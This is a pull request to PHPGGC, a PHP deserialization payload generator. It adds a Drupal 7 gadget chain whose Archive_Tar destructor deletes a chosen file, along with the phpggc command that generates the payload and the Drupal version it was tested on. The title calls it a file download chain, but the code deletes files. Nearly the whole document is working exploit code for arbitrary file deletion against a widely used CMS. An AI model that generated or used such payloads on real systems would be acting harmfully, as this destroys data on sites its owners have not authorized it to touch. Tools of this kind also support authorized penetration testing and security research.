### PR TITLE
Add Drupal7 file download gadget chain

### DIFF
--- a/gadgetchains/Drupal7/FD/1/chain.php
+++ b/gadgetchains/Drupal7/FD/1/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Drupal7;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public $version = '7.0 < ?';
+    public $vector = '__destruct';
+    public $author = 'rreiss';
+    public $informations = 'Note that some files may not be removed (depends on the its permissions)';
+    public $parameters = [
+        'remote_file'
+    ];
+
+    public function generate(array $parameters)
+    {
+        return new \Archive_Tar($parameters['remote_file']);
+    }
+}

--- a/gadgetchains/Drupal7/FD/1/gadgets.php
+++ b/gadgetchains/Drupal7/FD/1/gadgets.php
@@ -1,0 +1,11 @@
+<?php
+
+class Archive_Tar
+{
+    public $_temp_tarname;
+
+    public function __construct($_temp_tarname) {
+        $this->_temp_tarname = $_temp_tarname;
+    }
+
+}


### PR DESCRIPTION
New gadget chain that uses the `Archive_Tar`'s destructor to unlink (delete) files.

Tested on Drupal 7.61 with simple unserialize method that gets the payload from a GET param.

Used the following command to generate the payload:
`/opt/phpggc/phpggc -f -a -u Drupal7/FD1 delete-me.txt`